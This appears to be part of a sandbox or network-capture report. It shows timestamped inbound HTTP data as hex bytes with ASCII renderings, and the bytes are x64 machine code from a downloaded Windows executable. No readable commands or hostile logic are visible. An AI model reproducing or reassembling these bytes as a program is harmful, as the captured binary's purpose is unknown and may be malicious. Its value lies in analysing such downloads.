                                                    2022-05-23 07:19:16 UTC36INData Raw: 6b c0 20 48 8b 4c 24 50 48 8b 44 01 58 83 38 00 75 1d 48 63 44 24 30 48 6b c0 20 ba 02 00 00 00 48 8b 4c 24 50 48 8b 4c 01 58 e8 6b ba ff ff 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 83 7c 01 50 00 74 16 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 83 7c 01 60 00 75 5a 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 83 7c 01 50 00 75 16 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 83 7c 01 60 00 74 2e 48 8d 05 3c 9e 01 00 48 89 44 24 20 45 33 c9 41 b8 bc 00 00 00 48 8d 15 b7 9d 01 00 b9 02 00 00 00 e8 6d 1a 00 00 83 f8 01 75 03 cc 33 c0 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 83 7c 01 50 00 74 4b 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 83 7c 01 60 00 74 35 48 63 44 24 30 48 6b c0 20 48 8b 4c 24 50 48 8b 44 01 60 83 38 00 75 1d 48 63 44 24 30 48
                                                    Data Ascii: k HL$PHDX8uHcD$0Hk HL$PHLXkHcD$0Hk HL$PH|PtHcD$0Hk HL$PH|`uZHcD$0Hk HL$PH|PuHcD$0Hk HL$PH|`t.H<HD$ E3AHmu3HcD$0Hk HL$PH|PtKHcD$0Hk HL$PH|`t5HcD$0Hk HL$PHD`8uHcD$0H
                                                    2022-05-23 07:19:16 UTC37INData Raw: 47 10 66 89 04 4a eb ce c7 44 24 20 00 00 00 00 eb 0a 8b 44 24 20 ff c0 89 44 24 20 81 7c 24 20 01 01 00 00 7d 20 48 63 44 24 20 48 63 4c 24 20 48 8d 15 2a 1b 02 00 48 8b 7c 24 28 0f b6 44 07 1c 88 04 0a eb cc c7 44 24 20 00 00 00 00 eb 0a 8b 44 24 20 ff c0 89 44 24 20 81 7c 24 20 00 01 00 00 7d 23 48 63 44 24 20 48 63 4c 24 20 48 8d 15 fc 1b 02 00 48 8b 7c 24 28 0f b6 84 07 1d 01 00 00 88 04 0a eb c9 48 8b 05 e3 1c 02 00 b9 ff ff ff ff f0 0f c1 08 ff c9 8b c1 85 c0 75 21 48 8d 05 9b 18 02 00 48 39 05 c4 1c 02 00 74 11 ba 02 00 00 00 48 8b 0d b6 1c 02 00 e8 81 b4 ff ff 48 8b 44 24 28 48 89 05 a5 1c 02 00 48 8b 44 24 28 f0 ff 00 b9 0d 00 00 00 e8 93 f4 ff ff eb 2f 83 7c 24 38 ff 75 28 48 8d 05 53 18 02 00 48 39 44 24 28 74 0f ba 02 00 00 00 48 8b 4c 24 28
                                                    Data Ascii: GfJD$ D$ D$ |$ } HcD$ HcL$ H*H|$(DD$ D$ D$ |$ }#HcD$ HcL$ HH|$(Hu!HH9tHHD$(HHD$(/|$8u(HSH9D$(tHL$(
                                                    2022-05-23 07:19:16 UTC39INData Raw: 24 30 77 2e 8b 44 24 30 ff c0 8b c0 48 8b 8c 24 88 00 00 00 0f b6 44 01 1c 83 c8 04 8b 4c 24 30 ff c1 8b c9 48 8b 94 24 88 00 00 00 88 44 0a 1c eb b9 eb 82 c7 44 24 30 01 00 00 00 eb 0a 8b 44 24 30 ff c0 89 44 24 30 81 7c 24 30 ff 00 00 00 73 2e 8b 44 24 30 ff c0 8b c0 48 8b 8c 24 88 00 00 00 0f b6 44 01 1c 83 c8 08 8b 4c 24 30 ff c1 8b c9 48 8b 94 24 88 00 00 00 88 44 0a 1c eb be 48 8b 84 24 88 00 00 00 8b 48 04 e8 a8 00 00 00 48 8b 8c 24 88 00 00 00 89 41 0c 48 8b 84 24 88 00 00 00 c7 40 08 01 00 00 00 eb 0f 48 8b 84 24 88 00 00 00 c7 40 08 00 00 00 00 c7 44 24 20 00 00 00 00 eb 0a 8b 44 24 20 ff c0 89 44 24 20 83 7c 24 20 06 73 15 8b 44 24 20 33 c9 48 8b 94 24 88 00 00 00 66 89 4c 42 10 eb da 48 8b 8c 24 88 00 00 00 e8 a0 01 00 00 33 c0 eb 1f 83 3d 1d
                                                    Data Ascii: $0w.D$0H$DL$0H$DD$0D$0D$0|$0s.D$0H$DL$0H$DH$HH$AH$@H$@D$ D$ D$ |$ sD$ 3H$fLBH$3=
                                                    2022-05-23 07:19:16 UTC40INData Raw: 44 01 1c 83 c8 20 8b 8c 24 70 05 00 00 ff c1 8b c9 48 8b 94 24 b0 05 00 00 88 44 0a 1c 8b 84 24 70 05 00 00 8b 8c 24 70 05 00 00 48 8b 94 24 b0 05 00 00 0f b6 84 04 60 03 00 00 88 84 0a 1d 01 00 00 eb 17 8b 84 24 70 05 00 00 48 8b 8c 24 b0 05 00 00 c6 84 01 1d 01 00 00 00 e9 e8 fe ff ff e9 1a 01 00 00 c7 84 24 70 05 00 00 00 00 00 00 eb 10 8b 84 24 70 05 00 00 ff c0 89 84 24 70 05 00 00 81 bc 24 70 05 00 00 00 01 00 00 0f 83 ec 00 00 00 83 bc 24 70 05 00 00 41 72 5e 83 bc 24 70 05 00 00 5a 77 54 8b 84 24 70 05 00 00 ff c0 8b c0 48 8b 8c 24 b0 05 00 00 0f b6 44 01 1c 83 c8 10 8b 8c 24 70 05 00 00 ff c1 8b c9 48 8b 94 24 b0 05 00 00 88 44 0a 1c 8b 84 24 70 05 00 00 83 c0 20 8b 8c 24 70 05 00 00 48 8b 94 24 b0 05 00 00 88 84 0a 1d 01 00 00 eb 7f 83 bc 24 70
                                                    Data Ascii: D $pH$D$p$pH$`$pH$$p$p$p$p$pAr^$pZwT$pH$D$pH$D$p $pH$$p
                                                    2022-05-23 07:19:16 UTC41INData Raw: 00 00 00 00 c7 84 24 a0 00 00 00 00 00 00 00 48 83 bc 24 60 12 00 00 00 75 0a b8 01 00 00 00 e9 72 05 00 00 c6 84 24 b4 11 00 00 00 41 b8 04 01 00 00 48 8d 94 24 b0 10 00 00 33 c9 ff 15 fc 72 01 00 85 c0 75 46 4c 8d 05 09 93 01 00 ba 04 01 00 00 48 8d 8c 24 b0 10 00 00 e8 37 26 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 3c 01 00 00 4c 8d 0d ef 8e 01 00 4c 8d 05 b0 92 01 00 48 8d 15 41 92 01 00 8b c8 e8 6a d1 ff ff 48 8d 84 24 b0 10 00 00 48 89 84 24 98 00 00 00 48 8b 8c 24 98 00 00 00 e8 6d 2a 00 00 48 83 f8 40 0f 86 8d 00 00 00 48 8b 8c 24 98 00 00 00 e8 56 2a 00 00 48 8b 8c 24 98 00 00 00 48 8d 44 01 c0 48 89 84 24 98 00 00 00 48 8d 84 24 b0 10 00 00 48 8b 8c 24 98 00 00 00 48 2b c8 48 8b c1 b9 04 01 00 00 48 2b c8 48 8b c1 41 b9 03 00 00 00 4c 8b 05
                                                    Data Ascii: $H$`ur$AH$3ruFLH$7&HD$(D$ <LLHAjH$H$H$m*H@H$V*H$HDH$H$H$H+HH+HAL
                                                    2022-05-23 07:19:16 UTC43INData Raw: e8 68 59 00 00 89 84 24 c0 11 00 00 83 bc 24 c0 11 00 00 03 75 14 b9 16 00 00 00 e8 7d 1c 00 00 b9 03 00 00 00 e8 13 bd ff ff 83 bc 24 c0 11 00 00 04 75 07 b8 01 00 00 00 eb 02 33 c0 48 8b 8c 24 28 12 00 00 48 33 cc e8 e0 7e ff ff 48 81 c4 38 12 00 00 c3 cc cc cc cc cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 48 89 54 24 10 89 4c 24 08 48 83 ec 48 48 8d 44 24 78 48 89 44 24 30 48 8b 44 24 30 48 89 44 24 28 48 8b 44 24 70 48 89 44 24 20 4c 8b 4c 24 68 44 8b 44 24 60 48 8b 54 24 58 8b 4c 24 50 e8 23 00 00 00 89 44 24 38 48 c7 44 24 30 00 00 00 00 8b 44 24 38 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 44 89 44 24 18 48 89 54 24 10 89 4c 24 08 48 83 ec 38 48 8b 44 24 68 48 89 44 24 28 48 8b 44 24 60 48 89 44 24 20 4c 8b 4c 24 58 44 8b
                                                    Data Ascii: hY$$u}$u3H$(H3~H8LL$ DD$HT$L$HHHD$xHD$0HD$0HD$(HD$pHD$ LL$hDD$`HT$XL$P#D$8HD$0D$8HHLL$ DD$HT$L$H8HD$hHD$(HD$`HD$ LL$XD
                                                    2022-05-23 07:19:16 UTC44INData Raw: 89 54 24 68 48 8b 94 24 e8 22 00 00 48 89 54 24 60 48 8b 94 24 f0 22 00 00 48 89 54 24 58 48 8b 94 24 f8 22 00 00 48 89 54 24 50 48 8b 94 24 00 23 00 00 48 89 54 24 48 48 8b 94 24 08 23 00 00 48 89 54 24 40 48 8b 94 24 18 23 00 00 48 89 54 24 38 48 8b 94 24 20 23 00 00 48 89 54 24 30 48 8b 94 24 98 00 00 00 48 89 54 24 28 48 8b 04 c1 48 89 44 24 20 4c 8d 0d f8 89 01 00 41 b8 ff 0f 00 00 ba 00 10 00 00 48 8d 8c 24 b0 00 00 00 e8 50 5c 00 00 89 84 24 a0 00 00 00 83 bc 24 a0 00 00 00 00 7d 47 e8 da f1 ff ff 48 c7 44 24 38 00 00 00 00 c7 44 24 30 60 01 00 00 48 8d 0d f2 83 01 00 48 89 4c 24 28 48 8d 0d 0e 8c 01 00 48 89 4c 24 20 4c 8d 0d 2a 7a 01 00 41 b8 22 00 00 00 ba 16 00 00 00 8b 08 e8 08 b5 ff ff e8 93 f1 ff ff 8b 8c 24 c4 22 00 00 89 08 83 bc 24 a0 00
                                                    Data Ascii: T$hH$"HT$`H$"HT$XH$"HT$PH$#HT$HH$#HT$@H$#HT$8H$ #HT$0H$HT$(HHD$ LAH$P\$$}GHD$8D$0`HHL$(HHL$ L*zA"$"$
                                                    2022-05-23 07:19:16 UTC45INData Raw: 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 41 b8 01 00 00 00 ba 17 04 00 c0 b9 02 00 00 00 e8 23 00 00 00 ff 15 35 62 01 00 ba 17 04 00 c0 48 8b c8 ff 15 1f 62 01 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc 44 89 44 24 18 89 54 24 10 89 4c 24 08 57 48 81 ec 10 06 00 00 48 8b 05 ac f1 01 00 48 33 c4 48 89 84 24 00 06 00 00 83 bc 24 20 06 00 00 ff 74 0c 8b 8c 24 20 06 00 00 e8 03 cf ff ff c7 84 24 60 05 00 00 00 00 00 00 48 8d 84 24 64 05 00 00 48 8b f8 33 c0 b9 94 00 00 00 f3 aa 48 8d 84 24 60 05 00 00 48 89 44 24 40 48 8d 44 24 70 48 89 44 24 48 c7 44 24 50 00 00 00 00 c7 84 24 50 05 00 00 00 00 00 00 48 8d 4c 24 70 ff 15 b7 61 01 00 48 8b 84 24 68 01 00 00 48 89 84 24 48 05 00 00 45 33 c0 48 8d 94 24 58 05 00 00 48 8b 8c 24 48 05 00 00
                                                    Data Ascii: LD$HT$HL$H(A#5bHbH(DD$T$L$WHHH3H$$ t$ $`H$dH3H$`HD$@HD$pHD$HD$P$PHL$paH$hH$HE3H$XH$H
                                                    2022-05-23 07:19:16 UTC47INData Raw: 48 e8 dc a4 ff ff 48 8b 00 48 89 84 24 80 00 00 00 48 8d 4c 24 48 e8 c7 a4 ff ff c7 44 24 38 01 00 00 00 48 8b 4c 24 78 8b 49 14 89 4c 24 30 48 8b 8c 24 80 00 00 00 8b 49 04 89 4c 24 28 48 8d 4c 24 40 48 89 4c 24 20 44 8b 4c 24 44 4c 8d 44 24 68 ba 01 00 00 00 48 8b c8 e8 13 31 00 00 85 c0 75 18 c7 44 24 70 00 00 00 00 48 8d 4c 24 48 e8 2d a4 ff ff 8b 44 24 70 eb 1e 0f b7 44 24 40 23 84 24 a8 00 00 00 89 44 24 74 48 8d 4c 24 48 e8 0d a4 ff ff 8b 44 24 74 48 81 c4 98 00 00 00 c3 cc cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 4c 8b d9 48 2b d1 0f 82 9e 01 00 00 49 83 f8 08 72 61 f6 c1 07 74 36 f6 c1 01 74 0b 8a 04 0a 49 ff c8 88 01 48 ff c1 f6 c1 02 74 0f 66 8b 04 0a 49 83 e8 02 66 89 01 48 83 c1 02 f6 c1 04 74 0d 8b 04 0a 49 83 e8 04 89 01 48 83 c1 04
                                                    Data Ascii: HHH$HL$HD$8HL$xIL$0H$IL$(HL$@HL$ DL$DLD$hH1uD$pHL$H-D$pD$@#$D$tHL$HD$tHffLH+Irat6tIHtfIfHtIH
                                                    2022-05-23 07:19:16 UTC48INData Raw: 38 e8 43 81 ff ff 48 89 44 24 30 48 83 7c 24 30 00 75 04 33 c0 eb 76 48 8b 44 24 38 48 8b 4c 24 48 48 2b c8 48 8b c1 48 c1 f8 03 48 8b 4c 24 30 48 8d 04 c1 48 89 44 24 48 48 8b 44 24 30 48 89 44 24 38 48 8b 4c 24 38 ff 15 a3 57 01 00 48 89 05 64 1e 02 00 48 8b 4c 24 70 ff 15 91 57 01 00 48 8b 4c 24 48 48 89 01 48 8b 44 24 48 48 83 c0 08 48 89 44 24 48 48 8b 4c 24 48 ff 15 70 57 01 00 48 89 05 29 1e 02 00 48 8b 44 24 70 48 83 c4 68 c3 cc cc cc cc cc cc cc 48 89 4c 24 08 48 83 ec 38 48 8b 4c 24 40 e8 ed fd ff ff 48 85 c0 75 0a c7 44 24 20 ff ff ff ff eb 08 c7 44 24 20 00 00 00 00 8b 44 24 20 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 48 c7 44 24 20 cc 00 00 00 4c 8d 0d c5 7d 01 00 41 b8 02 00 00 00 ba 08 00 00 00 b9 20 00 00 00 e8 c8 7f
                                                    Data Ascii: 8CHD$0H|$0u3vHD$8HL$HH+HHHL$0HHD$HHD$0HD$8HL$8WHdHL$pWHL$HHHD$HHHD$HHL$HpWH)HD$pHhHL$H8HL$@HuD$ D$ D$ H8HHD$ L}A
                                                    2022-05-23 07:19:16 UTC49INData Raw: c8 48 8b c1 41 b9 03 00 00 00 4c 8d 05 47 73 01 00 48 8b d0 48 8b 8c 24 60 02 00 00 e8 4f 65 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 1a 01 00 00 4c 8d 0d b7 86 01 00 4c 8d 05 90 86 01 00 48 8d 15 d9 84 01 00 8b c8 e8 92 b1 ff ff 4c 8d 05 a3 75 01 00 ba 14 03 00 00 48 8d 0d 2f ff 01 00 e8 0a 5f 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 1d 01 00 00 4c 8d 0d 72 86 01 00 4c 8d 05 4b 86 01 00 48 8d 15 14 84 01 00 8b c8 e8 4d b1 ff ff 4c 8b 44 24 30 ba 14 03 00 00 48 8d 0d ec fe 01 00 e8 c7 5e 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 1e 01 00 00 4c 8d 0d 2f 86 01 00 4c 8d 05 08 86 01 00 48 8d 15 41 83 01 00 8b c8 e8 0a b1 ff ff 41 b8 10 20 01 00 48 8d 15 dd 82 01 00 48 8d 0d a6 fe 01 00 e8 81 43 00 00 48 8b 8c 24 80 02 00 00 48 33 cc e8 71 63 ff ff
                                                    Data Ascii: HALGsHH$`OeHD$(D$ LLHLuH/_HD$(D$ LrLKHMLD$0H^HD$(D$ L/LHAA HHCH$H3qc
                                                    2022-05-23 07:19:16 UTC51INData Raw: c4 78 c3 4a d0 00 00 ea d0 00 00 9a d0 00 00 c2 d0 00 00 72 d0 00 00 3e d1 00 00 00 05 01 05 02 05 01 05 05 01 05 05 05 03 05 05 05 05 05 04 02 cc cc cc cc cc cc cc 48 89 54 24 10 89 4c 24 08 48 83 ec 18 48 8b 44 24 28 48 89 04 24 48 8b 04 24 8b 4c 24 20 39 48 04 74 2a 48 8b 04 24 48 83 c0 10 48 89 04 24 48 63 05 d6 62 01 00 48 6b c0 10 48 8b 4c 24 28 48 03 c8 48 8b c1 48 39 04 24 73 02 eb c9 48 63 05 b8 62 01 00 48 6b c0 10 48 8b 4c 24 28 48 03 c8 48 8b c1 48 39 04 24 73 15 48 8b 04 24 8b 4c 24 20 39 48 04 75 08 48 8b 04 24 eb 04 eb 02 33 c0 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 48 8b 0d a5 ff 01 00 ff 15 af 4c 01 00 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc 48 89 4c 24 08 48 8b 44 24 08 48 89 05 97 ff 01 00 c3 cc cc cc cc cc cc
                                                    Data Ascii: xJr>HT$L$HHD$(H$H$L$ 9Ht*H$HH$HcbHkHL$(HHH9$sHcbHkHL$(HHH9$sH$L$ 9HuH$3HH(HLH(HL$HD$H
                                                    2022-05-23 07:19:16 UTC52INData Raw: 24 70 48 8b 44 24 38 48 8b 8c 24 98 00 00 00 48 2b c8 48 8b c1 48 8b 8c 24 90 00 00 00 48 8d 44 01 01 4c 8b 44 24 70 ba fe 00 00 00 48 8b c8 e8 ba 59 ff ff 33 c0 48 81 c4 88 00 00 00 c3 cc cc cc cc cc cc 66 66 0f 1f 84 00 00 00 00 00 48 8b c1 48 f7 d9 48 a9 07 00 00 00 74 0f 66 90 8a 10 48 ff c0 84 d2 74 5f a8 07 75 f3 49 b8 ff fe fe fe fe fe fe 7e 49 bb 00 01 01 01 01 01 01 81 48 8b 10 4d 8b c8 48 83 c0 08 4c 03 ca 48 f7 d2 49 33 d1 49 23 d3 74 e8 48 8b 50 f8 84 d2 74 51 84 f6 74 47 48 c1 ea 10 84 d2 74 39 84 f6 74 2f 48 c1 ea 10 84 d2 74 21 84 f6 74 17 c1 ea 10 84 d2 74 0a 84 f6 75 b9 48 8d 44 01 ff c3 48 8d 44 01 fe c3 48 8d 44 01 fd c3 48 8d 44 01 fc c3 48 8d 44 01 fb c3 48 8d 44 01 fa c3 48 8d 44 01 f9 c3 48 8d 44 01 f8 c3 cc cc cc cc cc cc cc cc 89
                                                    Data Ascii: $pHD$8H$H+HH$HDLD$pHY3HffHHHtfHt_uI~IHMHLHI3I#tHPtQtGHt9t/Ht!ttuHDHDHDHDHDHDHDHD
                                                    2022-05-23 07:19:16 UTC53INData Raw: 8b 44 24 30 48 8b 88 40 01 00 00 e8 05 75 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 48 01 00 00 e8 ef 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 50 01 00 00 e8 d9 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 70 01 00 00 e8 c3 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 78 01 00 00 e8 ad 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 80 01 00 00 e8 97 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 88 01 00 00 e8 81 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 90 01 00 00 e8 6b 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 98 01 00 00 e8 55 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 68 01 00 00 e8 3f 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 a8 01 00 00 e8 29 74 ff ff ba 02 00 00 00 48 8b 44 24 30 48 8b 88 b0 01 00 00 e8 13
                                                    Data Ascii: D$0H@uHD$0HHtHD$0HPtHD$0HptHD$0HxtHD$0HtHD$0HtHD$0HktHD$0HUtHD$0Hh?tHD$0H)tHD$0H
                                                    2022-05-23 07:19:16 UTC55INData Raw: 34 62 35 38 0d 0a 48 18 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 18 e8 05 70 ff ff 48 8b 44 24 30 48 8b 0d 39 db 01 00 48 39 48 20 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 20 e8 e0 6f ff ff 48 8b 44 24 30 48 8b 0d 1c db 01 00 48 39 48 28 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 28 e8 bb 6f ff ff 48 8b 44 24 30 48 8b 0d ff da 01 00 48 39 48 30 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 30 e8 96 6f ff ff 48 8b 44 24 30 48 8b 0d e2 da 01 00 48 39 48 38 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 38 e8 71 6f ff ff 48 8b 44 24 30 48 8b 0d c5 da 01 00 48 39 48 40 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 40 e8 4c 6f ff ff 48 8b 44 24 30 48 8b 0d a8 da 01 00 48 39 48 48 74 13 ba 02 00 00 00 48 8b 44 24 30 48 8b 48 48 e8 27 6f ff ff 48 8b 44 24
                                                    Data Ascii: 4b58HtHD$0HHpHD$0H9H9H tHD$0HH oHD$0HH9H(tHD$0HH(oHD$0HH9H0tHD$0HH0oHD$0HH9H8tHD$0HH8qoHD$0HH9H@tHD$0HH@LoHD$0HH9HHtHD$0HHH'oHD$
                                                    2022-05-23 07:19:16 UTC59INData Raw: 24 40 e8 46 00 00 00 48 8b 4c 24 50 e8 3c 00 00 00 8b 44 24 48 48 81 c4 98 00 00 00 c3 89 54 24 10 48 89 4c 24 08 48 83 7c 24 08 00 74 19 48 8b 44 24 08 8b 4c 24 10 89 08 48 8b 44 24 08 48 83 c0 10 48 89 44 24 08 48 8b 44 24 08 c3 48 89 4c 24 08 48 83 ec 48 48 83 7c 24 50 00 74 6d 48 8b 44 24 50 48 83 e8 10 48 89 44 24 50 48 8b 44 24 50 8b 00 89 44 24 30 81 7c 24 30 dd dd 00 00 75 0c 48 8b 4c 24 50 e8 a2 69 00 00 eb 3e 81 7c 24 30 cc cc 00 00 74 34 33 c0 85 c0 75 2e 48 8d 05 09 6d 01 00 48 89 44 24 20 45 33 c9 41 b8 f8 00 00 00 48 8d 15 84 6c 01 00 b9 02 00 00 00 e8 5a bf ff ff 83 f8 01 75 03 cc 33 c0 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 89 54 24 10 48 89 4c 24 08 48 83 ec 18 8b 44 24 28 89 44 24 08 48 8b 44 24 20 48 89 04 24 8b 44 24 08
                                                    Data Ascii: $@FHL$P<D$HHT$HL$H|$tHD$L$HD$HHD$HD$HL$HHH|$PtmHD$PHHD$PHD$PD$0|$0uHL$Pi>|$0t43u.HmHD$ E3AHlZu3HHT$HL$HD$(D$HD$ H$D$
                                                    2022-05-23 07:19:16 UTC63INData Raw: 83 bc 24 30 81 00 00 00 74 11 48 8d 05 df 67 01 00 48 89 84 24 c8 80 00 00 eb 0f 48 8d 05 a6 67 01 00 48 89 84 24 c8 80 00 00 4c 8b 84 24 c8 80 00 00 ba 00 10 00 00 48 8d 8c 24 70 30 00 00 e8 e4 11 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 0b 02 00 00 4c 8d 0d 2c 5d 01 00 4c 8d 05 25 69 01 00 48 8d 15 ae 66 01 00 8b c8 e8 67 7b ff ff 4c 8d 84 24 70 50 00 00 ba 00 10 00 00 48 8d 8c 24 70 30 00 00 e8 dd 28 00 00 48 c7 44 24 28 00 00 00 00 c7 44 24 20 0d 02 00 00 4c 8d 0d e5 5c 01 00 4c 8d 05 de 68 01 00 48 8d 15 07 66 01 00 8b c8 e8 20 7b ff ff 83 bc 24 10 81 00 00 02 0f 85 a5 00 00 00 48 63 84 24 10 81 00 00 48 8d 0d 13 ba 01 00 8b 04 81 83 e0 01 85 c0 74 46 4c 8d 05 ce 65 01 00 ba 00 10 00 00 48 8d 8c 24 70 30 00 00 e8 70 28 00 00 48 c7 44 24 28 00 00
                                                    Data Ascii: $0tHgH$HgH$L$H$p0HD$(D$ L,]L%iHfg{L$pPH$p0(HD$(D$ L\LhHf {$Hc$HtFLeH$p0p(HD$(
                                                    2022-05-23 07:19:16 UTC67INData Raw: 00 00 48 8b 44 24 30 48 39 05 95 bf 01 00 74 2c 48 8b 0d 8c bf 01 00 ff 15 36 0c 01 00 48 89 84 24 88 00 00 00 48 83 bc 24 88 00 00 00 00 74 0c ff 94 24 88 00 00 00 48 89 44 24 58 48 83 7c 24 58 00 74 3f 48 8b 44 24 30 48 39 05 5b bf 01 00 74 31 48 8b 0d 52 bf 01 00 ff 15 f4 0b 01 00 48 89 84 24 90 00 00 00 48 83 bc 24 90 00 00 00 00 74 11 48 8b 4c 24 58 ff 94 24 90 00 00 00 48 89 44 24 58 48 8b 0d 11 bf 01 00 ff 15 c3 0b 01 00 48 89 84 24 98 00 00 00 48 83 bc 24 98 00 00 00 00 74 28 44 8b 8c 24 d0 00 00 00 4c 8b 84 24 c8 00 00 00 48 8b 94 24 c0 00 00 00 48 8b 4c 24 58 ff 94 24 98 00 00 00 eb 04 eb 02 33 c0 48 8b 8c 24 a0 00 00 00 48 33 cc e8 06 1d ff ff 48 81 c4 b8 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 4c 89 44 24 18 48 89
                                                    Data Ascii: HD$0H9t,H6H$H$t$HD$XH|$Xt?HD$0H9[t1HRH$H$tHL$X$HD$XHH$H$t(D$L$H$HL$X$3H$H3HLL$ LD$H
                                                    2022-05-23 07:19:16 UTC71INData Raw: 24 78 ff 0f 84 81 00 00 00 48 81 7c 24 78 ff ff ff 7f 74 76 8b 44 24 30 ff c0 48 98 48 3b 44 24 78 73 67 8b 44 24 30 ff c0 48 98 48 8b 4c 24 78 48 2b c8 48 8b c1 48 39 05 e1 8a 01 00 73 0e 48 8b 05 d8 8a 01 00 48 89 44 24 58 eb 18 8b 44 24 30 ff c0 48 98 48 8b 4c 24 78 48 2b c8 48 8b c1 48 89 44 24 58 8b 44 24 30 ff c0 48 98 48 8b 4c 24 70 48 03 c8 48 8b c1 4c 8b 44 24 58 ba fe 00 00 00 48 8b c8 e8 04 0d ff ff 8b 44 24 30 48 83 c4 68 c3 cc cc cc cc cc cc cc cc cc cc cc 4c 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 81 ec 88 00 00 00 c7 44 24 30 ff ff ff ff c7 44 24 34 00 00 00 00 48 83 bc 24 a8 00 00 00 00 74 0a c7 44 24 44 01 00 00 00 eb 08 c7 44 24 44 00 00 00 00 8b 44 24 44 89 44 24 38 83 7c 24 38 00 75 2e 48 8d 05 1a 4f 01 00 48 89 44
                                                    Data Ascii: $xH|$xtvD$0HH;D$xsgD$0HHL$xH+HH9sHHD$XD$0HHL$xH+HHD$XD$0HHL$pHHLD$XHD$0HhLL$ LD$HT$HL$HD$0D$4H$tD$DD$DD$DD$8|$8u.HOHD
                                                    2022-05-23 07:19:16 UTC74INData Raw: 32 31 35 62 0d 0a 00 00 00 ff ff ff 7f 74 5e 48 83 bc 24 a8 00 00 00 01 76 53 48 8b 84 24 a8 00 00 00 48 ff c8 48 39 05 ae 81 01 00 73 0e 48 8b 05 a5 81 01 00 48 89 44 24 58 eb 10 48 8b 84 24 a8 00 00 00 48 ff c8 48 89 44 24 58 48 8b 44 24 58 48 d1 e0 48 8b 8c 24 a0 00 00 00 48 83 c1 02 4c 8b c0 ba fe 00 00 00 e8 dd 03 ff ff 48 83 bc 24 b0 00 00 00 00 74 0a c7 44 24 60 01 00 00 00 eb 08 c7 44 24 60 00 00 00 00 8b 44 24 60 89 44 24 44 83 7c 24 44 00 75 2e 48 8d 05 d2 27 01 00 48 89 44 24 20 45 33 c9 41 b8 13 00 00 00 48 8d 15 75 48 01 00 b9 02 00 00 00 e8 8b 84 ff ff 83 f8 01 75 03 cc 33 c0 83 7c 24 44 00 75 3e e8 f7 7b ff ff c7 00 16 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 13 00 00 00 4c 8d 05 3b 48 01 00 48 8d 15 14 48 01 00 48 8d 0d 75 27 01 00 e8 08
                                                    Data Ascii: 215bt^H$vSH$HH9sHHD$XH$HHD$XHD$XHH$HLH$tD$`D$`D$`D$D|$Du.H'HD$ E3AHuHu3|$Du>{HD$ AL;HHHHu'
                                                    2022-05-23 07:19:16 UTC78INData Raw: 01 00 00 e9 a4 01 00 00 48 8b 84 24 a0 00 00 00 83 78 0c 00 75 58 48 8b 84 24 a0 00 00 00 8b 00 25 ff ff ff 1f 3d 21 05 93 19 0f 82 7c 01 00 00 48 8b 84 24 a0 00 00 00 83 78 20 00 74 1b e8 52 a7 ff ff 48 8b 8c 24 a0 00 00 00 48 63 49 20 48 03 c1 48 89 44 24 60 eb 09 48 c7 44 24 60 00 00 00 00 48 83 7c 24 60 00 0f 84 3e 01 00 00 48 8b 84 24 80 00 00 00 81 38 63 73 6d e0 0f 85 d4 00 00 00 48 8b 84 24 80 00 00 00 83 78 18 03 0f 82 c2 00 00 00 48 8b 84 24 80 00 00 00 81 78 20 22 05 93 19 0f 86 ad 00 00 00 48 8b 84 24 80 00 00 00 48 8b 40 30 83 78 08 00 74 1f e8 f5 a6 ff ff 48 8b 8c 24 80 00 00 00 48 8b 49 30 48 63 49 08 48 03 c1 48 89 44 24 68 eb 09 48 c7 44 24 68 00 00 00 00 48 8b 44 24 68 48 89 44 24 50 48 83 7c 24 50 00 74 61 0f b6 84 24 b8 00 00 00 89 44
                                                    Data Ascii: H$xuXH$%=!|H$x tRH$HcI HHD$`HD$`H|$`>H$8csmH$xH$x "H$H@0xtH$HI0HcIHHD$hHD$hHD$hHD$PH|$Pta$D
